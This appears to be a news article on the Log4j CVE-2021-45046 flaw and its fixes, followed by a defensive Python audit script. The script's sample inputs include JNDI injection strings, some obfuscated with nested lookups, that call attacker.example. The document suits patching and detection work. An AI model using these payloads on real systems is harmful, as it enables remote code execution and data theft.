Friday, June 14, 2024

In addition to “Log4Shell” in the Java Log4j library, a new vulnerability “CVE-2021-45046” was discovered and can be fixed by updating – GIGAZINE


A critical vulnerability, CVE-2021-44228, commonly known as “Log4Shell”, was discovered in Log4j, a Java logging library; it allows arbitrary code to be executed remotely. The Apache Software Foundation (ASF), which maintains Log4j, has now disclosed a further vulnerability, CVE-2021-45046, and is asking users to update Log4j to version 2.16.0 or later.

CVE – CVE-2021-45046

CVE-2021-45046: Red Hat Customer Portal

Log4Shell Update: Second log4j vulnerability released (CVE-2021-44228 + CVE-2021-45046) | LunaSec

Protection against CVE-2021-45046, the additional vulnerability Log4j RCE

The following article summarizes Log4Shell, which has been confirmed to affect Log4j versions 2.0-beta9 through 2.14.1.

Why does the “Log4Shell (CVE-2021-44228)” vulnerability found in the Java Log4j library have a major impact on the world? – GIGAZINE

On December 10, 2021, ASF released version 2.15.0 with a fix for Log4Shell. It then turned out that this fix is incomplete in certain non-default configurations. According to Apache, when the logging configuration uses a non-default Pattern Layout that includes Thread Context data, either through a Context Lookup (for example ${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), an attacker who controls that input can supply malicious data containing a JNDI Lookup pattern and cause a denial of service. Apache later revised the advisory to note that in some environments the same vector can also lead to information leakage or remote code execution.

Until then, setting the system property log4j2.formatMsgNoLookups to true had been circulated as a workaround for Log4Shell, but CVE-2021-45046 shows that this mitigation is insufficient: it only applies to the log message text, not to Thread Context values substituted by the layout, so an attacker can bypass it in the configurations described above.

ASF therefore released version 2.16.0 (for Java 8 or later) on December 14, 2021. Version 2.16.0 addresses the newly discovered CVE-2021-45046: JNDI access is disabled by default and the message lookup feature has been removed entirely …

ASF has also released Log4j version 2.12.2 for the Java 7 runtime. Version 2.12.1 had previously been the final Log4j release for Java 7, but 2.12.2 was published to address both Log4Shell and CVE-2021-45046 on that runtime. ASF asks users to update Log4j as soon as possible.
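As an added illustration (not part of the GIGAZINE article, and not code from the Log4j project), the following Python script audits a deployment against the conditions described above: it checks whether a Log4j version is one of the fixed releases named here (2.16.0 or later, or 2.12.2 on Java 7), scans a log4j2.xml configuration for PatternLayouts that pull Thread Context data into the line (%X, %mdc, %MDC, ${ctx:...}), and flags input values carrying a JNDI lookup, including the nested-lookup obfuscations commonly used to hide it from naive filters. The configuration, the sample user inputs and the function names are constructed for this example; fixed releases for older Java runtimes that the article does not mention are not modelled.

```python
"""Added example: audit a deployment for the CVE-2021-45046 conditions above.

Assumptions (not from the article): the config is a log4j2.xml document, the
version string looks like "2.15.0" or "2.0-beta9", and only the fixed releases
the article names (2.16.0+ for Java 8, 2.12.2 for Java 7) count as fixed.
"""
import re
import xml.etree.ElementTree as ET

# Layout conversions that pull Thread Context (MDC) data into the formatted line.
THREAD_CONTEXT_RE = re.compile(r"%(?:X|mdc|MDC)\b|\$\{ctx:[^}]*\}")

# Nested-lookup obfuscations used to hide "${jndi:" from simple string matching.
CASE_LOOKUP_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_VALUE_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # ${x:-j} evaluates to "j"


def parse_version(version: str) -> tuple:
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised Log4j version: {version!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def is_fixed_for_45046(version: str) -> bool:
    """True only for the releases the advisory names as fixed."""
    major, minor, patch = parse_version(version)
    if major != 2:
        raise ValueError("only Log4j 2.x is covered by this check")
    if minor == 12:  # Java 7 line: 2.12.2 carries the backported fix
        return patch >= 2
    return (minor, patch) >= (16, 0)


def _local(tag: str) -> str:
    # Strip any namespace; Log4j configuration element names are case-insensitive.
    return tag.rsplit("}", 1)[-1].lower()


def vulnerable_pattern_layouts(config_xml: str) -> list:
    """Return the patterns of PatternLayouts that include Thread Context data."""
    hits = []
    for el in ET.fromstring(config_xml).iter():
        if _local(el.tag) != "patternlayout":
            continue
        pattern = el.get("pattern") or ""
        if not pattern:  # Log4j also accepts a nested <Pattern> element
            child = next((c for c in el if _local(c.tag) == "pattern"), None)
            pattern = (child.text or "").strip() if child is not None else ""
        if THREAD_CONTEXT_RE.search(pattern):
            hits.append(pattern)
    return hits


def normalise_lookup(value: str) -> str:
    """Collapse ${lower:x}, ${upper:x} and ${...:-x} innermost-first until stable."""
    prev = None
    while prev != value:
        prev = value
        value = CASE_LOOKUP_RE.sub(lambda m: m.group(1), value)
        value = DEFAULT_VALUE_RE.sub(r"\1", value)
    return value


def contains_jndi_lookup(value: str) -> bool:
    return "${jndi:" in normalise_lookup(value).lower()


def audit(version: str, config_xml: str, format_msg_no_lookups: bool = False) -> dict:
    """Verdict for one deployment. format_msg_no_lookups is the Log4Shell workaround
    flag; it guards only the message text, so it never clears a Thread Context exposure."""
    fixed = is_fixed_for_45046(version)
    risky = vulnerable_pattern_layouts(config_xml)
    exposed = (not fixed) and bool(risky)
    return {
        "version": version,
        "needs_upgrade": not fixed,
        "risky_patterns": risky,
        "thread_context_exposure": exposed,
        "workaround_bypassed": format_msg_no_lookups and exposed,
    }


# Constructed configuration: the Console appender uses a non-default layout that
# writes the Thread Context key "loginId" into every line; the File appender does not.
SAMPLE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d{HH:mm:ss} [%t] %-5level user=%X{loginId} %logger{36} - %msg%n"/>
    </Console>
    <File name="Audit" fileName="audit.log">
      <PatternLayout pattern="%d %p %c - %m%n"/>
    </File>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="Console"/><AppenderRef ref="Audit"/></Root></Loggers>
</Configuration>"""

# Constructed values an attacker might place in the "loginId" field.
SAMPLE_INPUTS = [
    "alice",
    "${jndi:ldap://attacker.example/a}",
    "${${lower:j}ndi:ldap://attacker.example/a}",
    "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}",
]

if __name__ == "__main__":
    for v in ("2.14.1", "2.15.0", "2.12.2", "2.16.0"):
        print(audit(v, SAMPLE_CONFIG, format_msg_no_lookups=True))
    for s in SAMPLE_INPUTS:
        print(f"{contains_jndi_lookup(s)!s:5} {s}")
```

Run against a 2.15.0 deployment with `log4j2.formatMsgNoLookups=true`, the audit still reports the Console layout as exposed, which is exactly the gap CVE-2021-45046 describes; only an upgrade to 2.16.0 (or 2.12.2 on Java 7) clears it.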

Ebenezer Robbins